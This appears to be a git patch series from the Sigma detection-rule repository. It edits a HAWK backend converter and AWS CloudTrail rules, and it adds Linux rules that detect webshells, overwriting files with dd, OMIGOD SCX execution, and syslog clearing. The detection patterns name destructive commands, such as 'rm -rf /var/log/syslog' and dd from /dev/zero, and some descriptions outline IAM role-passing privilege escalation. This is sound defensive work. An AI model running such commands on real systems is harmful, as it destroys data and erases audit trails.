node): + # return self.notNullExpression % (node.item) + return node.item + + def generateAggregation(self, agg, timeframe='00'): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) + raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) + """ + elif agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + elif agg.groupfield != None and timeframe != None: + for key, duration in self.generateTimeframe(timeframe).items(): + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + return self.prefixAgg, self.suffixAgg + else: + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + """ + #print(agg) + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") + + def generateTimeframe(self, timeframe): + time_unit = timeframe[-1:] + duration = timeframe[:-1] + timeframe_object = {} + if time_unit == "s": + timeframe_object['seconds'] = int(duration) + elif time_unit == "m": + timeframe_object['minutes'] = int(duration) + elif time_unit == "h": + timeframe_object['hours'] = int(duration) + elif time_unit == "d": + timeframe_object['days'] = int(duration) + else: + timeframe_object['months'] = int(duration) + return timeframe_object + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + #print(sigmaparser.parsedyaml) + #print(sigmaparser.condparsed) + for parsed in sigmaparser.condparsed: + query = self.generateQuery(parsed, sigmaparser) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def generateQuery(self, parsed, sigmaparser): + self.sigmaparser = sigmaparser + result = self.generateNode(parsed.parsedSearch) + self.parsedlogsource = sigmaparser.get_logsource().index + """ + if any("flow" in i for i in self.parsedlogsource): + aql_database = "flows" + else: + aql_database = "events" + """ + prefix = "" + ret = '[ { "id" : "and", "key": "And", "children" : [' + ret2 =" ] } ]" + """ + try: + mappedFields = [] + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + mappedFields.append(mapped) + if " " in mapped and not "(" in mapped: + prefix += ", \"" + mapped + "\"" + else: + prefix += ", " + mapped + + except KeyError: # no 'fields' attribute + mapped = None + pass + """ + + #if parsed.parsedAgg: #and timeframe == None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) + # result = prefix + result + # result += suffixAgg + #elif parsed.parsedAgg != None and timeframe != None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) + # result = prefix + result + # result += suffixAgg + #else: + # result = prefix + result + + #print(result) + result = prefix + json.dumps(result) + + # print(sigmaparser.parsedyaml) + + analytic_txt = ret + result + ret2 # json.dumps(ret) + try: + analytic = json.loads(analytic_txt) # json.dumps(ret) + except Exception as e: + print("Failed to parse json: %s" % analytic_txt) + raise Exception("Failed to parse json: %s" % analytic_txt) + # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + + record = { + "rules" : analytic, # analytic_txt.replace('"','""'), + "filter_name" : sigmaparser.parsedyaml['title'], + "actions_category_name" : "Add (+)", + "correlation_action" : 5.00, + "date_added" : sigmaparser.parsedyaml['date'], + "enabled" : True, + "public" : True, + "group_name" : ".", + "score_id" : sigmaparser.parsedyaml['id'] + } + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': + record['correlation_action'] += 10.0; + if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: + record['correlation_action'] -= (2.0 * len(self.sigmaparser.parsedyaml['falsepositives']) ) + + if 'level' in self.sigmaparser.parsedyaml: + if self.sigmaparser.parsedyaml['level'].lower() == 'critical': + record['correlation_action'] += 15.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'high': + record['correlation_action'] += 10.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'medium': + record['correlation_action'] += 5.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'low': + record['correlation_action'] += 2.0; + + return json.dumps(record) From 503a4bc72b21db3c499dfeec4357086c3b90c81a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 12:27:24 -0500 Subject: [PATCH 1224/1367] Update and rename aws_pass_role_to_lambda_function.yml to aws_lambda_function_created_or_invoked.yml --- ...yml => aws_lambda_function_created_or_invoked.yml} | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) rename rules/cloud/aws/{aws_pass_role_to_lambda_function.yml => aws_lambda_function_created_or_invoked.yml} (55%) diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml similarity index 55% rename from rules/cloud/aws/aws_pass_role_to_lambda_function.yml rename to rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index f8047050..e49d07cb 100644 --- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -1,9 +1,10 @@ -title: AWS Passed Role to Lambda Function +title: AWS Lambda Function Created or Invoked id: d914951b-52c8-485f-875e-86abab710c0b -description: Detects when an user with these permissions could escalate privileges by passing an existing IAM role to a new Lmbda function that includes code to import the AWS library to their programming lanugage. This can give access to the privileges associated with any Lambda service role that exists in the account and escalate to full administrator access to the account. +description: Detects when an user creates or invokes a lambda function. author: Austin Songer @austinsonger status: experimental date: 2021/10/03 +update: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ logsource: @@ -14,12 +15,12 @@ detection: eventName: CreateFunction selection2: eventSource: lambda.amazonaws.com - eventName: InvokeFunction - condition: selection1 and selection2 + eventName: Invoke +condition: selection1 and selection2 level: low tags: - attack.privilege_escalation - attack.t1078 falsepositives: - - Passed Role to New Lambda Function may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. From f7dba3fbffcfa311471e24011939abe4313c6f18 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 12:34:16 -0500 Subject: [PATCH 1225/1367] Update passed_role_to_glue_development_endpoint.yml --- .../passed_role_to_glue_development_endpoint.yml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index d22ebd8b..c8b3372e 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -1,9 +1,10 @@ -title: AWS Passed Role to Glue Development Endpoint +title: AWS Glue Development Endpoint Activity id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 -description: Detects when an user these permissions could create a new AWS Glue development endpoint and pass an existing service role to it. They then could SSH into the instance and use the AWS CLI to have access of the permissions the role has access to. The adversary could gain privileges associated with any Glue service role that exists in the account, which could range from no privilege escalation to full administrator access to the account. +description: Detects possible suspicious glue development endpoint activity. author: Austin Songer @austinsonger status: experimental date: 2021/10/03 +update: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html @@ -13,10 +14,16 @@ detection: selection1: eventSource: glue.amazonaws.com eventName: CreateDevEndpoint - condition: selection1 + selection2: + eventSource: glue.amazonaws.com + eventName: DeleteDevEndpoint + selection3: + eventSource: glue.amazonaws.com + eventName: UpdateDevEndpoint +condition: selection1 or selection2 or selection3 level: low tags: - attack.privilege_escalation falsepositives: - - Passed Role to Glue Development Endpoint may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. From 40879252a8e3a34759ce134fb1b336bab3901193 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 13 Oct 2021 16:25:28 -0500 Subject: [PATCH 1226/1367] Update aws_lambda_function_created_or_invoked.yml --- rules/cloud/aws/aws_lambda_function_created_or_invoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index e49d07cb..6c53fd99 100644 --- a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: lambda.amazonaws.com eventName: Invoke -condition: selection1 and selection2 +condition: selection1 | near selection2 level: low tags: - attack.privilege_escalation From 468cac031d405b6ddf9355d84e3015a2c10d719c Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 14 Oct 2021 07:19:41 +0200 Subject: [PATCH 1227/1367] fix status --- tools/sigma/filter.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index f33b5f0b..b99be7c0 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -24,7 +24,9 @@ class SigmaRuleFilter: "high" : 2, "critical" : 3 } - STATES = ["experimental", "testing", "stable"] + STATES = ["experimental", + "test", + "stable"] def __init__(self, expr): self.minlevel = None From 55f942b526f51ca22cfa30bd58d4a5bd76fff656 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 14 Oct 2021 08:53:50 +0200 Subject: [PATCH 1228/1367] fix: change error message --- tests/test_rules.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 2e6e0769..6d10f80e 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -170,7 +170,7 @@ class TestRules(unittest.TestCase): key_iterator(detection, faulty_fieldnames) self.assertEqual(faulty_fieldnames, [], Fore.RED + - "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character if the log source uses space)") + "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character '_' )") def test_single_named_condition_with_x_of_them(self): faulty_detections = [] From a7e6eb576c1b1e4142e6bfa212ed721a67d2158b Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Thu, 14 Oct 2021 15:55:05 +0400 Subject: [PATCH 1229/1367] Delete .DS_Store file --- .DS_Store | Bin 8196 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 30ea1bff625721dfd93203ca5da6e267b24ba887..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8196 zcmeHMzl#$=6n=B&mnhuXNXivNZS=g-ZtsY#%^`@5n#++BlG~7MY_!qz4($??I%x2&04>=nVb|%ccW!`)9ee+GS%i9o<+L#a4h`L17L1(*i z3`0p{KleggvNNY)74m5`T-)4=#*;#%pYRHJ1-t@Y0k42p;D1p7&ung;is!!Z`q3-k z6{w{Ge18bg*@o68#_C%K23-QcHZZLlu2=X1Hn29dHZc|+G-Xm@O{%gbhBE1x4{Tg$ zZDOoRCuNHdWs#MwP?Sc;`hgB76&mYDuYgyer~udQ4Z1)>x=pdH-__Mu-=uFG^?LnL z)W=-s&5g$g-M!E2u7B`H|70h7H=wTTR|M@8mv(4QeTfcI%UC@ZAvv6Su=M5UuTRXO z5S1~hj*@)rJ*!Py6wxllG=&;DKEpE_$%&AB?mvxFO>*muql`~=l*{J{z^DZlW4eX2 z*`}GJ&g$N?ykBy8ai^VXRK++vR(~*$CRB-WM%y%XShV){U9aTuVfkpvLF7vY z%ibo@%H(BV7D+hncfVVF>y`NHZy!ngMMU;nE01vS_3<(V-@F2~Q{af%ahL0V z{L-u5|JP0zzhSRHofJ@w-ezwDJ609D=2|;IzlqL`;}Tof2}{S^2OW??@L From 7e02555e22213c6ce0bc04a399fb6f247cafdfa5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 14 Oct 2021 14:24:56 +0200 Subject: [PATCH 1230/1367] refactor: credential dumper level increased --- rules/windows/driver_load/driver_load_mal_creddumper.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/driver_load/driver_load_mal_creddumper.yml b/rules/windows/driver_load/driver_load_mal_creddumper.yml index 5ff88625..76fb665b 100644 --- a/rules/windows/driver_load/driver_load_mal_creddumper.yml +++ b/rules/windows/driver_load/driver_load_mal_creddumper.yml @@ -6,7 +6,7 @@ related: description: Detects well-known credential dumping tools execution via service execution events author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 -modified: 2021/09/21 +modified: 2021/10/14 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -37,4 +37,4 @@ detection: condition: selection falsepositives: - Legitimate Administrator using credential dumping tool for password recovery -level: high +level: critical From 1a9f106d3449cadcd3cbeffc4ff1415280459cbe Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 14:17:03 +0000 Subject: [PATCH 1231/1367] Initial commmit of hawk analytic score generator --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index b2a775be..0bfe6192 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - # print(sigmaparser.parsedyaml) + print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From 6d6a57a3b436eb6a6a29f6389ae7e284e8f0d781 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 15:05:05 +0000 Subject: [PATCH 1232/1367] Add additional information to the analytic record, including tags, author info, rule id and references --- tools/sigma/backends/hawk.py | 23 ++++++++++++++++++++++- tools/sigma/sigmac.py | 3 ++- 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 0bfe6192..9d0e0611 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - print(sigmaparser.parsedyaml) + #print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: @@ -386,6 +386,23 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Failed to parse json: %s" % analytic_txt) # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + cmt = "Sigma Rule: %s\n" % sigmaparser.parsedyaml['id'] + cmt += "Author: %s\n" % sigmaparser.parsedyaml['author'] + cmt += "Level: %s\n" % sigmaparser.parsedyaml['level'] + if 'falsepositives' in sigmaparser.parsedyaml and type(sigmaparser.parsedyaml['falsepositives']) is list: + if len(sigmaparser.parsedyaml['falsepositives']) > 0: + cmt += "False Positives: " + for v in sigmaparser.parsedyaml['falsepositives']: + if v: + cmt += "%s, " % v + else: + cmt += "None, " + cmt = cmt[:-2] + "\n" + elif 'falsepositives' in sigmaparser.parsedyaml and sigmaparser.parsedyaml['falsepositives']: + raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) + + if 'references' in sigmaparser.parsedyaml: + cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -394,9 +411,13 @@ class HAWKBackend(SingleTextQueryBackend): "date_added" : sigmaparser.parsedyaml['date'], "enabled" : True, "public" : True, + "comments" : cmt, "group_name" : ".", "score_id" : sigmaparser.parsedyaml['id'] } + if 'tags' in sigmaparser.parsedyaml: + record["tags"] = sigmaparser.parsedyaml['tags'] + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 27f07a0c..6a153a6f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -22,7 +22,7 @@ import ruamel.yaml import json import pathlib import itertools -import logging +import logging, traceback from sigma.parser.collection import SigmaCollectionParser from sigma.parser.exceptions import SigmaCollectionParseError, SigmaParseError from sigma.configuration import SigmaConfiguration, SigmaConfigurationChain @@ -368,6 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 70b55f2c2d6fcab3e97495e2f6eaa7c980d9a6f4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 14 Oct 2021 12:10:29 -0500 Subject: [PATCH 1233/1367] Update aws_lambda_function_created_or_invoked.yml --- rules/cloud/aws/aws_lambda_function_created_or_invoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml index 6c53fd99..669ca76c 100644 --- a/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml +++ b/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml @@ -16,7 +16,7 @@ detection: selection2: eventSource: lambda.amazonaws.com eventName: Invoke -condition: selection1 | near selection2 + condition: selection1 | near selection2 level: low tags: - attack.privilege_escalation From 7ad08877042de90fb62100f4957f92a3da952e5a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 14 Oct 2021 12:10:48 -0500 Subject: [PATCH 1234/1367] Update passed_role_to_glue_development_endpoint.yml --- rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml index c8b3372e..c43ce53e 100644 --- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml +++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml @@ -20,7 +20,7 @@ detection: selection3: eventSource: glue.amazonaws.com eventName: UpdateDevEndpoint -condition: selection1 or selection2 or selection3 + condition: selection1 or selection2 or selection3 level: low tags: - attack.privilege_escalation From 231b54e526bdfb2d991f0062e4c5d6621b3e4dd7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 15 Oct 2021 14:39:32 +0200 Subject: [PATCH 1235/1367] rule: first Linux process_creation rule --- .../lnx_webshell_detection.yml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 rules/linux/process_creation/lnx_webshell_detection.yml diff --git a/rules/linux/process_creation/lnx_webshell_detection.yml b/rules/linux/process_creation/lnx_webshell_detection.yml new file mode 100644 index 00000000..a4a34298 --- /dev/null +++ b/rules/linux/process_creation/lnx_webshell_detection.yml @@ -0,0 +1,42 @@ +title: Linux Webshell Indicators +id: 818f7b24-0fba-4c49-a073-8b755573b9c7 +status: experimental +description: Detects suspicious sub processes of web server processes +references: + - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ +date: 2021/10/15 +author: Florian Roth +tags: + - attack.persistence + - attack.t1100 # an old one + - attack.t1505.003 +logsource: + product: linux + category: process_creation +detection: + selection_sub_processes: + Image|endswith: + - '/whoami' + - '/ifconfig' + - '/usr/bin/ip' + - '/bin/uname' + selection_general: + ParentImage|endswith: + - '/httpd' + - '/lighttpd' + - '/nginx' + - '/apache2' + - '/node' + selection_tomcat: + ParentCommandLine|contains|all: + - '/bin/java' + - 'tomcat' + selection_websphere: # ? just guessing + ParentCommandLine|contains|all: + - '/bin/java' + - 'websphere' + condition: selection_sub_processes and ( selection_general or selection_tomcat ) +falsepositives: + - Web applications that try to figure out the user that runs the web service +level: critical + From 5a144e186483ef9b883428d2c5e57674f7a9e7a2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 15 Oct 2021 14:46:13 +0200 Subject: [PATCH 1236/1367] sysmon for linux - process_creation mapping --- tools/config/generic/sysmon.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index da857d68..d7fc8989 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -9,6 +9,14 @@ logsources: rewrite: product: windows service: sysmon + process_creation_linux: + category: process_creation + product: linux + conditions: + EventID: 1 + rewrite: + product: linux + service: sysmon file_change: category: file_change product: windows From 8ee9d2f5b4a073ef5ddf9f69c6a9d5de669dd7cc Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 15 Oct 2021 15:12:44 +0200 Subject: [PATCH 1237/1367] docs: changes in description --- rules/linux/process_creation/lnx_webshell_detection.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/process_creation/lnx_webshell_detection.yml b/rules/linux/process_creation/lnx_webshell_detection.yml index a4a34298..21861818 100644 --- a/rules/linux/process_creation/lnx_webshell_detection.yml +++ b/rules/linux/process_creation/lnx_webshell_detection.yml @@ -37,6 +37,6 @@ detection: - 'websphere' condition: selection_sub_processes and ( selection_general or selection_tomcat ) falsepositives: - - Web applications that try to figure out the user that runs the web service + - Web applications that invoke Linux command line tools level: critical From ca99394e460d734d2738f6e925ea0a4842a82aea Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:28:15 -0400 Subject: [PATCH 1238/1367] detect overwriting and deletion of files via dd --- .../process_creation/dd_file_overwrite.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/linux/process_creation/dd_file_overwrite.yml diff --git a/rules/linux/process_creation/dd_file_overwrite.yml b/rules/linux/process_creation/dd_file_overwrite.yml new file mode 100644 index 00000000..8fe6ce2d --- /dev/null +++ b/rules/linux/process_creation/dd_file_overwrite.yml @@ -0,0 +1,26 @@ +title: DD File Overwrite +id: 2953194b-e33c-4859-b9e8-05948c167447 +status: experimental +description: Detects potential overwriting and deletion of a file using DD. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1485 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd +logsource: + product: linux + category: process_creation +detection: + selection: + Image: '/bin/dd' + CommandLine|contains: 'of=' + CommandLine|contains: + - 'if=/dev/zero' + - 'if=/dev/null' + condition: selection +falsepositives: + - Any user deleting files that way. +level: low \ No newline at end of file From f8cb0883d5357d871c0dd32b8189fe4175f6c624 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:38:09 -0400 Subject: [PATCH 1239/1367] OMI SCX Execute RunAsProvider rules --- ...omigod_scx_runasprovider_executescript.yml | 31 +++++++++++++++++++ ..._scx_runasprovider_executeshellcommand.yml | 31 +++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml create mode 100644 rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml new file mode 100644 index 00000000..308c92d4 --- /dev/null +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executescript.yml @@ -0,0 +1,31 @@ +title: OMIGOD SCX RunAsProvider ExecuteScript +id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db +status: experimental +description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml +logsource: + product: linux + category: process_creation +detection: + selection: + user: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider ExecuteScript. +level: high \ No newline at end of file diff --git a/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml new file mode 100644 index 00000000..34d3c7f3 --- /dev/null +++ b/rules/linux/process_creation/omigod_scx_runasprovider_executeshellcommand.yml @@ -0,0 +1,31 @@ +title: OMIGOD SCX RunAsProvider ExecuteShellCommand +id: 21541900-27a9-4454-9c4c-3f0a4240344a +status: experimental +description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +logsource: + product: linux + category: process_creation +detection: + selection: + user: root + LogonId: '0' + CurrentDirectory: '/var/opt/microsoft/scx/tmp' + CommandLine|contains: '/bin/sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. +level: high \ No newline at end of file From aa0a5b820466a3f3bcde9a93bbec13d5e6689872 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:43:42 -0400 Subject: [PATCH 1240/1367] commands to clear or remove the syslog rule --- rules/linux/process_creation/clear_syslog.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/linux/process_creation/clear_syslog.yml diff --git a/rules/linux/process_creation/clear_syslog.yml b/rules/linux/process_creation/clear_syslog.yml new file mode 100644 index 00000000..4c57557e --- /dev/null +++ b/rules/linux/process_creation/clear_syslog.yml @@ -0,0 +1,29 @@ +title: Commands to Clear or Remove the Syslog +id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 +status: experimental +description: Detects specific commands commonly used to remove or empty the syslog. +status: experimental +date: 2021/10/15 +author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.impact + - attack.t1565.001 +references: + - https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_clear_syslog.yml +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + condition: selection +falsepositives: + - Log rotation. +level: high \ No newline at end of file From 04ff9ae69271b7abfcd818e4c73bf19fa81d2019 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 15 Oct 2021 15:46:59 -0400 Subject: [PATCH 1241/1367] Updated at command rule to use Image field 